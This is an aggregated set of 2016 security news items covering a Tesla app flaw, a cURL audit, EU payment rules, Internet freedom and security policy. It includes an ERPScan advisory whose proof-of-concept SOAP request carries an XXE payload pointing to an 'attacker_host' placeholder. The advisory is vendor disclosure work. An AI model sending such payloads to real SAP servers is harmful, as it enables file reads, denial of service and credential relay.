Mohammed Rayed

A smartphone app flaw has left Tesla vehicles vulnerable to being tracked, located, unlocked, and stolen.

Security experts at Norwegian app security firm Promon were able to take full control of a Tesla vehicle, including finding where the car is parked, opening the door and enabling its keyless driving functionality. A lack of security in the Tesla smartphone app opened the door to all manner of exploits, as explained in a blog post here. The cyber-attack unearthed by Promon provides additional functionality to that exposed by Keen Security Labs in a different hack in late September.

Tom Lysemose Hansen, founder and CTO at Promon, said: "Keen Security Labs' recent research exploited flaws in the CAN bus systems of Tesla vehicles, enabling them to take control of a limited number of functions of the car. Our test is the first one to use the Tesla app as an entry point, and goes a step further by showing that a compromised app can lead directly to the theft of a car."

One way for the hack to work is for cybercriminals to set up a Wi-Fi hotspot, likely close to a public Tesla charging point. When Tesla users log in and visit a page, an advert targeting car owners appears, offering an incentive such as a free meal or coffee. When clicking this link and downloading the accompanying app, hackers can gain access to the user's mobile device, allowing them to attack the Tesla app and obtain usernames and passwords.

Youtube Video

In an update, Promon outlines the many and varied security shortcomings of Tesla's app.

This attack is not Tesla specific, and can in generalised form be used against any app. However, the Tesla app did not offer any kind of resistance which would require time-consuming effort to exploit.

One thing that stood out was that the OAuth token is stored in plain text – absolutely no attempts have been made to encrypt it, or otherwise protect it. Getting access to this one piece of data alone will get you the location of the car, ability to track the car and being able to unlock the car.

Driving off with the car requires the username and password in addition, which was very easy to do since the application did not detect that it had been modified to add malware-like behaviour that would send the credentials out of the app to a server.

"If Tesla had followed best practice in security (e.g. as recommended by the Open Web Application Security Project), including applying self-protecting capabilities inside the app, it would have required much higher technical skills – and much more effort – to perform such an attack," according to Promon. The Norwegian app security firm said that it was in "close dialogue with Tesla" in order to address these app security issues.

El Reg asked Tesla to comment on the research on Thursday, a US national holiday. We're yet to hear back but we'll update this story as and when we hear more.

John Smith, principal solutions architect at app security firm Veracode, commented: "With Tesla just recently remediating a vulnerability which allowed the car to be exploited remotely, this new security flaw leaves the car vulnerable to theft and highlights the plethora of challenges that car manufacturers now face as they introduce internet-connected services into the car. Vulnerable software is one of the most significant challenges faced by the automotive industry, with findings from a recent IDC report indicating that there could be a lag of up to three years before car security systems are protected from hackers.

"There are over 200 million lines of code in today's connected car, not to mention smartphone apps linked to the car. So it is essential that car manufacturers put security at the heart of the development strategy, rather than as an afterthought." ®

Sponsored: Transforming software delivery with DevOps


The Register - Security

Mozilla has given the widely-used cURL file transfer library a thumbs up in a security audit report that uncovered nine vulnerabilities.

Of those found in the free security review were four high severity vulnerabilities leading to potential remote code execution, and the same number of medium risk bugs. One low risk man-in-the-middle TLS flaw was also uncovered.

A medium case insensitivity credential flaw in ConnectionExists() comparing passwords with strequal() was not fixed given the obscurity and difficulty of the attack.

The remaining bugs were shuttered in seven patches after two vulnerabilities were combined in the largest cURL fix to date.

More fixes are on the way, cURL lead developer and Mozilla engineer Daniel Stenberg says.

"While working on the issues one-by-one to have them fixed we also ended up getting an additional four security issues to add to the set [from] three independent individuals," Stenberg says.

"All these issues [made for] a really busy period and … I could get a short period of relief until the next tsunami hits."

Five Mozilla engineers from the Berlin-based Cure53 team which conducted the 20-day source code audit.

"Sources covering authentication, various protocols, and, partly, SSL/TLS, were analysed in considerable detail. A rationale behind this type of scoping pointed to these parts of the cURL tool that were most likely to be prone and exposed to real-life attack scenarios," the team wrote in the [PDF].

"At the same time, the overall impression of the state of security and robustness of the cURL library was positive."

Stenberg says he applied for the audit fearing a recent run of security vulnerability reports may have pointed to undiscovered underlying problems.

The report was finished 23 September and fixes produced over the ensuing months.

The developer says fewer checks and possible borked patches may result from the decision to audit in secret.

"One of the primary [downsides] is that we get much fewer eyes on the fixes and there aren’t that many people involved when discussing solutions or approaches to the issues at hand," Stenberg says.

"Another is that our test infrastructure is made for and runs only public code [which] can’t really be fully tested until it is merged into the public git repository." ®

Audit vulnerabilities:

  • CRL -01-021 UAF via insufficient locking for shared cookies ( High)
  • CRL -01-005 OOB write via unchecked multiplication in base 64_ encode () ( High)
  • CRL -01-009 Double - free in krb 5 read _ data () due to missing realloc () check ( High)
  • CRL -01-014 Negative array index via integer overflow in unescape _ word () ( High)
  • CRL -01-001 Malicious server can inject cookies for other servers ( Medium)
  • CRL -01-007 Double - free in aprintf () via unsafe size _t multiplication ( Medium)
  • CRL -01-013 Heap overflow via integer truncation ( Medium)
  • CRL -01-002 ConnectionExists () compares passwords with strequal () ( Medium)
  • CRL -01-011 FTPS TLS session reuse ( Low)

Sponsored: The state of mobile security maturity


The Register - Security

To state the obvious, organizations of all shapes and sizes are under constant attack in cyberspace. Some ignore the risk, hoping that it will simply go away or that they won’t suffer a breach. Others opt to weather the storm even if a breach occurs, willingly risking their critical data. Others still deny that a breach would dramatically affect their business. Is this a risk your organization is willing to take?

Take Action to Protect Critical Data

Some forward-looking organizations focus on protecting their critical data assets because they are vital to their business operations and competitive positioning. These organizations understand they must protect critical data to sustain competitiveness in today’s global economy. Assets such as intellectual property, trade secrets, customer information, information about mergers and acquisitions, health information and other sensitive data are extremely valuable to cybercriminals.

Organizations are taking action to understand the type of data they possess, the value of that data to the organization, the controls that are in place and the potential impact to business processes should the data be breached or corrupted. They are implementing the controls required to protect these sensitive assets and monitor potential risks.

Watch the on-demand webinar to learn more about protecting your critical data

A Collaborative Effort

Discussion should not solely be focused on the type of controls in place, the number of patches applied or the number of incidents detected. We need to discuss potential business disruptions due to cyberattacks and the business processes that may be affected. Risk management should be a collaborative effort between business leaders and the IT team.

Are your line-of-business (LOB) owners and executives aware of the risk to their critical data? Do they know which LOBs carry the greatest risk, what sensitive data is at risk, how valuable the data is, who owns the data and which users are putting the data at risk?

Executive boards must understand the need to protect critical data — it’s no longer just an IT issue. In turn, IT leaders must make sure business leaders have the insight they need to protect their assets.

Learn More

For more information, check out the on-demand webinar titled “Stop Playing ‘Chicken’ With Your Data-Related Business Risk — Protect Your Critical Data.”

To learn more about why traditional security metrics are irrelevant to most executives, download the Gartner report titled “Develop Key Risk Indicators and Security Metrics That Influence Business Decision-Making.”


Security Intelligence

Welcome to “In Security,” the new web comic that takes a lighter look at the dark wave of threats crashing across business networks, endpoints, data and users. Click here for an introduction to the team and be sure to read Episode 001 and Episode 002.

Every App team visits the X-Force Cyber Range

Now that EveryApp has seen the Pandapocalypse attacks occur in real time, will they need to sing another chorus of “Where do we go from here?” next episode? Most likely!

How the Command Center Can Help

Network and IT security is no longer a point solution placed on the perimeter. It’s no longer one simple scenario that has a linear playbook of answers. Today’s malicious actors are attackers on all fronts of the ever-expanding enterprise. When businesses make a move to enable themselves with new technology, those that would cause harm won’t be far behind in exploiting any open and available sieves.

The EveryApp team made the right call to visit the Cambridge Command Center to assess the current threat landscape and learn the steps toward rapid remediation. But tomorrow will be a different day.

What about your organization? Are you prepared for today’s threats? What about tomorrow’s unknowns?

Learn More

Interested in learning more about how IBM’s X-Force Command Centers will help clients stay ahead of the most advanced threats? You can:

  • Visit the XFCC website.
  • Read the data sheet, “How IBM X-Force Command Centers Are Changing Security.”
  • Download the white paper, “The Role of Cyber Ranges and Capture the Flag Exercises in Security Incident Response Planning.”
  • Watch the video.


Security Intelligence

For the sixth year in a row, Internet freedom is declining.

According to the latest Freedom on the Net report, 67 percent of all Internet users now live in countries where online criticism of the government, ruling family or the military is subjected to censorship, and such activity can result in individuals getting arrested.

Blocking social media apps

Also, more governments have come to realize the power of social media and messaging apps, and are actively trying to censor them or prevent their use, particularly during anti-government protests, but also because they help thwart their surveillance efforts.

“The increased controls show the importance of social media and online communication for advancing political freedom and social justice. It is no coincidence that the tools at the center of the current crackdown have been widely used to hold governments accountable and facilitate uncensored conversations,” says Freedom House, the NGO that compiled the report that focuses on developments that occurred between June 2015 and May 2016.

“Authorities in several countries have even resorted to shutting down all internet access at politically contentious times.”

The “problem” with some communication apps is that they encrypt the exchanges, but it’s interesting to note that the use of some online voice and video calling apps is being blocked or restricted in a number of countries, mainly because they eat away at the profit margins of national telecommunications firms.

The range of censored online content is also expanding, and includes news outlets that favor political opposition, sites that launch calls for protest, sites expounding LGBTI issues, and images.

China, Syria, Iran, Ethiopia and Uzbekistan lead the pack of countries with the smallest amount of Internet freedom. On the other end of the spectrum are Estonia, Iceland, Canada, the US, and Germany.

State of Internet freedom around the world

“Of the 65 countries assessed, 34 have been on a negative trajectory since June 2015. The steepest declines were in Uganda, Bangladesh, Cambodia, Ecuador, and Libya,” Freedom House noted.

“In Uganda, the government made a concerted effort to restrict internet freedom in the run-up to the presidential election and inauguration in the first half of 2016, blocking social media platforms and communication services such as Facebook, Twitter, and WhatsApp for several days. In Bangladesh, Islamist extremists claimed responsibility for the murders of a blogger and the founder of an LGBTI magazine with a community of online supporters. And Cambodia passed an overly broad telecommunications law that put the industry under government control, to the detriment of service providers and user privacy. Separately, Cambodian police arrested several people for their Facebook posts, including one about a border dispute with Vietnam.”

While there have been improvements in 14 other countries, they are small, and not always the result of positive government actions.

The tug of war between protestors, digital activists, and companies offering social media services and communication apps on one side, and a wide variety of governments on the other continues.


Help Net Security

The EU banking regulator’s plans to reduce fraud by obliging the use of passwords, codes or a card reader to authenticate electronic payments above 10 euros have drawn fire from the payments industry.

Visa and others argue that mandated authentication checks put forward by the European Banking Authority risk disrupting online shopping without increasing security.

The concern is that making customers jump through more hoops to complete online transactions will result in increased cart abandonment rates, which will likely impact retailers’ bottom line.

The regulation threatens to cramp one-click shopping and automatic app payment technologies for anything other than small payments, the argument goes.

“Changes mean no more express checkouts or quick in-app payments from mobiles, reduced access to non-European online shopping sites, and longer queues at places like toll booths and parking,” according to Visa.

The payments technology company took the unusual step of putting out a statement lambasting the EBA’s draft plan for strong customer authentication (SCA), the final version of which is due out in January.

Robert Capps, VP of business development at behaviour-based biometrics firm NuData Security, said, “We’d tend to support Visa’s stance on this issue in several ways. While it may seem that adding more identity tests to the transaction stream should make the transaction more secure, this isn’t necessarily true.

“If the test is vulnerable to impersonation, as we see with physical biometrics, or is as vulnerable as passwords, no number of additional touchpoints will make the transaction more secure,” he added.

The proposed changes are part of the European Commission’s forthcoming Payment Services Directive 2. If ratified as part of the proposals, strong customer authentication would come into effect across Europe from 2018 onwards. ®

Sponsored: The state of mobile security maturity


The Register - Security

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.4

Vendor URL: http://SAP.com

Bug: XXE

Sent: 09.03.2016

Reported: 10.03.2016

Vendor response: 10.03.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2296909

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-034] SAP NetWeaver AS JAVA a XXE vulnerability in
BC-BMT-BPM-DSK component

Advisory ID:[ERPSCAN-16-034]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-034-sap-netweaver-java-xxe-vulnerability-bc-bmt-bpm-dsk-component/

Date published: 11.11.2016

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: XXE

Impact: Denial of Service, Read File

Remotely Exploitable: yes

Locally Exploitable: no

CVSS Information

CVSS Base Score v3: 6.4 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) High (H)

PR : Privileges Required (Level of privileges needed to exploit) Low (L)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity Low (L)

A : Impact to Availability High (H)

3. VULNERABILITY DESCRIPTION

1) It is possible, that an attacker can perform a DoS attack (for
example, an XML Entity expansion attack)

2) An SMB Relay attack is a type of man-in-the-middle attack where an
attacker asks a victim to authenticate to a machine controlled by the
attacker, then relays the credentials to the target. The attacker
forwards the authentication information both ways, giving him access.

4. VULNERABLE PACKAGES

BPEM PORTAL CONTENT 7.20

BPEM PORTAL CONTENT 7.30

BPEM PORTAL CONTENT 7.31

BPEM PORTAL CONTENT 7.40

BPEM PORTAL CONTENT 7.50

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2296909

6. AUTHOR

Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION

PoC

```

POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1

Content-Type: text/xml

User-Agent: ERPscan

Host: SAP_IP:SAP_PORT

Content-Length: 480

Connection: Keep-Alive

Cache-Control: no-cache

Authorization: Basic ZXJwc2NhbjplcnBzY2Fu

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host">
]><SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">

<SOAP-ENV:Body>

<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>

&xxe;</SOAP-ENV:Body>

</SOAP-ENV:Envelope>

```

8. REPORT TIMELINE

Sent: 09.03.2016

Reported: 10.03.2016

Vendor response: 10.03.2016

Date of Public Advisory: 09.08.2016

9. REFERENCES

[ERPSCAN-16-034] SAP NetWeaver AS JAVA – XXE vulnerability in BC-BMT-BPM-DSK component

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized infosec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
aEmerging Vendora in Security by CRN, listed among aTOP 100 SAP
Solution providersa and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScanas primary mission is to close the gap between technical and
business security, and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We afollow the suna and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.

Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security


Exploit Files ≈ Packet Storm

The 2016 presidential election put the spotlight on cybersecurity in a way that no one could have imagined ahead of time. When we looked at cybersecurity as an election issue earlier this year, the focus was on how cybersecurity policy in general might emerge as a campaign issue in relation to issues such as privacy and surveillance.

Instead, cybersecurity became a leading driver of the presidential campaign — including concerns about security posture of the election itself. In the process, the election offered many cybersecurity lessons, and a year of teachable moments about protecting data and networks.

Cybersecurity Lessons From the Campaign Trail

Most recent public and business awareness about data security has revolved around personally identifiable information (PII), especially financial information such as credit card data. Consumers fear identity theft and companies fear theft of customers’ account data.

Thanks to the presidential election, we have all learned — again — that email is insecure. It can easily be compromised and released online with potentially dramatic consequences. It is unlikely that analysts will ever be able to conclude whether controversies over email had a major impact on the election, but the very word became an effective campaign slogan.

More Than Meets the Eye

At the basis of this surprising turn are issues related to how email is secured and the consequences of email being compromised, whether it contains classified materials or merely unguarded and potentially embarrassing remarks. These considerations figured into the high-profile Sony breach of 2014, but the election brought them back into the public spotlight. The lesson here is applicable beyond just email: All kinds of unstructured data, such as social media content, is potentially sensitive and potentially vulnerable to compromise.

Similarly, the cybersecurity lessons of the 2016 election extend to the election process itself. Worries about compromised voting machines are not entirely new, but they were front and center this year. The Department of Homeland Security (DHS) also warned that state election systems were being probed and encouraged officials to share information regarding election cybersecurity.

Cybersecurity in the National Spotlight

The 2016 election ultimately went smoothly, with unexpected results but no hint of cybercrime. U.S. elections are, in fact, difficult to breach. This is partly because they are decentralized, carried out by thousands of local authorities, and partly because voting machines are simple devices and not connected to the internet, even where votes are tabulated electronically.

Nevertheless, election security has now emerged as a key component of national security policy. Although there was little formal discussion about cybersecurity as a policy issue, the 2016 election offered countless cybersecurity lessons and informed the public about the need to protect all kinds of information, not just financial or health data.


Security Intelligence

Dyn Confirms DDoS Attack Affecting Twitter, Github, Many Others

October 21, 2016 , 10:01 am

IoT Botnets Are The New Normal of DDoS Attacks

October 5, 2016 , 8:51 am

Leftover Factory Debugger Doubles as Android Backdoor

October 14, 2016 , 9:00 am

iPhone Call History Synced to iCloud Without User Consent, Knowledge

November 17, 2016 , 1:51 pm

Microsoft Patches Zero Day Disclosed by Google

November 8, 2016 , 2:57 pm

Microsoft Says Russian APT Group Behind Zero-Day Attacks

November 1, 2016 , 5:50 pm

Google to Make Certificate Transparency Mandatory By 2017

October 29, 2016 , 6:00 am

Microsoft Extends Malicious Macro Protection to Office 2013

October 27, 2016 , 4:27 pm

Dyn DDoS Work of Script Kiddies, Not Politically Motivated Hackers

October 25, 2016 , 3:00 pm

Mirai-Fueled IoT Botnet Behind DDoS Attacks on DNS Providers

October 22, 2016 , 6:00 am

FruityArmor APT Group Used Recently Patched Windows Zero Day

October 20, 2016 , 7:00 am

Experts ‘Outraged’ by Warrant Demanding Fingerprints to Unlock Smartphones

October 18, 2016 , 4:58 pm

Researchers Break MarsJoke Ransomware Encryption

October 3, 2016 , 5:00 am

OpenSSL Fixes Critical Bug Introduced by Latest Update

September 26, 2016 , 10:45 am

500 Million Yahoo Accounts Stolen By State-Sponsored Hackers

September 22, 2016 , 3:47 pm

Yahoo Reportedly to Confirm Breach of Hundreds of Millions of Credentials

September 22, 2016 , 12:31 pm

Experts Want Transparency From Government’s Vulnerabilities Equities Process

September 20, 2016 , 2:41 pm

Bruce Schneier on Probing Attacks Testing Core Internet Infrastructure

September 15, 2016 , 11:15 am

Generic OS X Malware Detection Method Explained

September 13, 2016 , 9:14 am

Patched Android Libutils Vulnerability Harkens Back to Stagefright

September 9, 2016 , 2:06 pm

Chrome to Label Some HTTP Sites ‘Not Secure’ in 2017

September 8, 2016 , 3:43 pm

Threatpost News Wrap, September 2, 2016

September 2, 2016 , 9:00 am

Insecure Redis Instances at Core of Attacks Against Linux Servers

September 1, 2016 , 1:08 pm

Dropbox Forces Password Reset for Older Users

August 29, 2016 , 9:58 am

Cisco Begins Patching Equation Group ASA Zero Day

August 24, 2016 , 5:53 pm

New Collision Attacks Against 3DES, Blowfish Allow for Cookie Decryption

August 24, 2016 , 8:00 am

Cisco Acknowledges ASA Zero Day Exposed by ShadowBrokers

August 17, 2016 , 4:06 pm

Pokémon GO Spam, Ransomware, On the Rise

August 17, 2016 , 12:58 pm

ProjectSauron APT On Par With Equation, Flame, Duqu

August 8, 2016 , 1:40 pm

Miller, Valasek Deliver Final Car Hacking Talk

August 4, 2016 , 3:26 pm

Researchers Go Inside a Business Email Compromise Scam

August 4, 2016 , 10:00 am

Export-Grade Crypto Patching Improves

August 3, 2016 , 10:00 am

Kaspersky Lab Launches Bug Bounty Program

August 2, 2016 , 9:00 am

Threatpost News Wrap, July 29, 2016

July 29, 2016 , 10:45 am

KeySniffer Vulnerability Opens Wireless Keyboards to Snooping

July 26, 2016 , 9:30 am

Upcoming Tor Design Battles Hidden Services Snooping

July 25, 2016 , 3:51 pm

EFF Files Lawsuit Challenging DMCA’s Restrictions on Security Researchers

July 21, 2016 , 1:18 pm

Oracle Patches Record 276 Vulnerabilities with July Critical Patch Update

July 20, 2016 , 9:21 am

Threatpost News Wrap, July 15, 2016

July 15, 2016 , 11:00 am

Academics Build Early-Warning Ransomware Detection System

July 14, 2016 , 1:05 pm

xDedic Hacked Server Market Resurfaces on Tor Domain

July 12, 2016 , 11:40 am

Conficker Used in New Wave of Hospital IoT Device Attacks

June 30, 2016 , 11:48 am

655,000 Healthcare Records Being Sold on Dark Web

June 28, 2016 , 10:00 am

Windows Zero Day Selling for $ 90,000

May 31, 2016 , 5:44 pm

Millions of Stolen MySpace, Tumblr Credentials Being Sold Online

May 31, 2016 , 1:37 pm

OTR Protocol Patched Against Remote Code Execution Flaw

March 10, 2016 , 10:23 am

Facebook Debuts Open Source Detection Tool for Windows

September 27, 2016 , 12:24 pm

Serious Dirty Cow Linux Vulnerability Under Attack

October 21, 2016 , 11:21 am

Popular Android App Leaks Microsoft Exchange User Credentials

October 14, 2016 , 8:00 am

Cisco Warns of Critical Flaws in Nexus Switches

October 7, 2016 , 10:55 am

Free Tool Protects Mac Users from Webcam Surveillance

October 7, 2016 , 7:00 am


Threatpost | The first stop for security news

It’s no secret that conservatives, who will soon control all three branches of the U.S. government with the election of President Trump, are more liable to give more power and deference to law enforcement. Perhaps the strongest influence is the likely appointment of one to three conservative Supreme Court justices.

What does that mean for computer security? What are the good and the bad possible outcomes?

[ An InfoWorld exclusive: Go inside a security operations center. | President Trump: An uncertain future for tech industry, digital rights. | Discover how to secure your systems with InfoWorld’s Security Report newsletter. ]

Increased privacy concerns

In general, most governments and their law enforcement agencies would like the ability to invade citizens’ privacy whenever they feel it would benefit their investigations. At the same time, businesses and marketers want as much insight into their potential customers’ lives to better sell goods and services.

Neither impulse necessarily derives from evil intent. Anyone performing any job wants the tools and access to make their jobs easier. But this natural need should be balanced by citizen privacy protections, codified in law, to make these intrusions justifiable, legal, and minimal. Most countries struggle to find the right balance.

In the United States, hundreds of acts and laws govern privacy. Some of the notable ones:

  • The Privacy Act of 1974
  • The Patriot Act and its successors
  • The Freedom of Information Act

Any law or guidance that affects the operations and activities of the National Security Agency, Federal Bureau of Investigation, or Central Intelligence Agency impacts American and foreign citizens around the world.

We already have red light cameras, public CCTV, automated license plate readers, and toll booth sensors that collect information about our vehicles and our travel. Much of that information is intended to be stored in perpetuity. Dozens of “fusion centers” aggregate information about everything from book-buying habits to childcare choices. Many law enforcement agencies don’t need warrants to use cellphone tracking technology such as Stingray. Moreover, you can be compelled by a court to provide your cellphone’s PIN, even if it leads to self-incrimination.

The recent political shift is likely to encourage even less privacy, with expanded government and business invasions. One ray of hope: A small contingent of libertarians want to protect or even broaden citizen privacy. These libertarians made themselves known after recent leaks involving the CIA and NSA. The resulting public uproar resulted in a few positive changes to the extension of the Patriot Act. Unfortunately, those gains were modest and short-lived.

Impact on government security

Few people think the election of a new president will improve the security of government computers, which remains in a lamentable state. That said, the U.S. government has some impact on security through guidelines and recommendations.

The top two issuers of these directives are the Defense Information Systems Agency, which is directly responsible for protecting our government’s information security assets, and the National Institute for Standard and Technology, which publishes the United States Government Configuration Baseline. The Baseline mandates computer security configurations across many government agencies. Both agencies’ computer security initiatives, as flawed as they may be, have had significant impact on securing government agency computers.

The trend over the years has been for these guidelines to be even more inclusive in providing a solid set of computer security recommendations. Implementing them does reduce risk. In fact, many of the people charged with implementing them will tell you they go too far and break too many applications—a good complaint to hear when you’re a computer security pro! Plus, the Defense Information Systems Agency is looking at implementing strict application control (that is, whitelisting) on managed computers, which should significantly complicate hackers’ plans.

Increasing the security of government computers was already a top priority. I don’t expect the new administration to try and remove those “troublesome regulations.”

Mandated security defenses for business

Some wonder if private businesses will be mandated to be more secure. Since incoming President Trump and other conservatives ran on a platform of fewer government regulations, it’s unlikely we’ll see new computer security defenses mandated for private businesses. I see a risk, though, that some of what’s already out there may be weakened or removed.

Will that make a difference either way? We already have sweeping regulations and guidelines, such as the Payment Card Industry’s Data Security Standard for credit cards, the Health Insurance Portability and Accountability Act, and the NIST Cybersecurity Framework, which attempts to cover, recommend, and enforce basic computer security best practices. Would another new law really help?

Barring an unforeseen, cataclysmic computer security attack against multiple businesses or our financial system, I don’t think new laws mandating additional computer security for businesses will be passed anytime soon.

Punishment for hackers

Trump campaigned as the “law and order” candidate, so I expect law enforcement to be better funded and sentences for breaking the law to be intensified. Law enforcement will probably be enabled with more ways to catch and identify hackers and those able to be brought to American justice will likely face longer and more severe sentences.

I, of course, support these measures. Unfortunately, all administrations learn how hard it is to catch and prosecute hackers, especially when they are located in unreachable areas. On a related note, I don’t think the new administration will be any more successful in trying to put down all the Russian ransomware campaigns.

Funding for STEM and immigration

The U.S. federal government has been increasing funds for STEM (science, technology, engineering, and math) for a long time now. Whether that continues at current levels is anyone’s guess.

It’s important to note, however, that the United States' own STEM colleges have a disproportionate number of students born of recent immigrants. No American who won a Nobel Prize in science or economics this year was originally born here. Because Trump ran on an anti-immigrant platform, many scholars may opt to study and gain citizenship in countries other than the United States.

Lastly, the new administration has run on the idea of giving states more control over their public education systems. While this can be good for a number of reasons, it could potentially mean further uneven promotion and preparedness for STEM careers in some states versus others. Plus, it could directly mean less federal STEM funding in general to the states that continue to aggressively pursue it.

To comment on this article and other InfoWorld content, visit InfoWorld's LinkedIn page, Facebook page and Twitter stream.


InfoWorld Security Adviser